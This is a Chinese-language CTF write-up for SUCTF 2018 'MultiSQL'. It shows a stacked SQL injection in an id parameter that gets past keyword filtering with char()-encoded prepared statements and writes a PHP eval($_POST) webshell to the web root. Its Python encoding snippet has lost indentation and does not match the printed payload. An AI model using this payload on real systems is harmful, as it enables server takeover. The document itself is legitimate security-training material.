[SUCTF 2018]MultiSQL
场景
![[SUCTF 2018]MultiSQL_第1张图片](http://img.e-com-net.com/image/info8/5007d9f4c9994e4b9f78b85a016105c0.jpg)
注册登录
![[SUCTF 2018]MultiSQL_第2张图片](http://img.e-com-net.com/image/info8/30ea200617d943c5a63fe411074a3d43.jpg)
进入用户信息页面。
![[SUCTF 2018]MultiSQL_第3张图片](http://img.e-com-net.com/image/info8/5ebea42c2f2a474e9c983fa61bd5652e.jpg)
看到url中多了id参数,修改。
![[SUCTF 2018]MultiSQL_第4张图片](http://img.e-com-net.com/image/info8/836f9b7b41b749d3ba7649ecf91f3df8.jpg)
做到这已经知道是sql注入题。测试后知道这里可以异或布尔盲注和堆叠注入,但后面就注不出来了。fuzz后发现过滤了union,select之类的关键字。
参考wp,这里要用预处理写shell。
str="select '' into outfile '/var/www/html/favicon/shell.php';"
len_str=len(str)
for i in range(0,len_str):
if i == 0:
print('char(%s'%ord(str[i]),end="")
else:
print(',%s'%ord(str[i]),end="")
print(')')
得到
char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)
payload:
1;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare payload from @sql;execute payload;
成功写入shell
![[SUCTF 2018]MultiSQL_第5张图片](http://img.e-com-net.com/image/info8/a4a66514802e4951a7c64fb25aac62d5.jpg)
最后配合shell在根目录找到flag
参考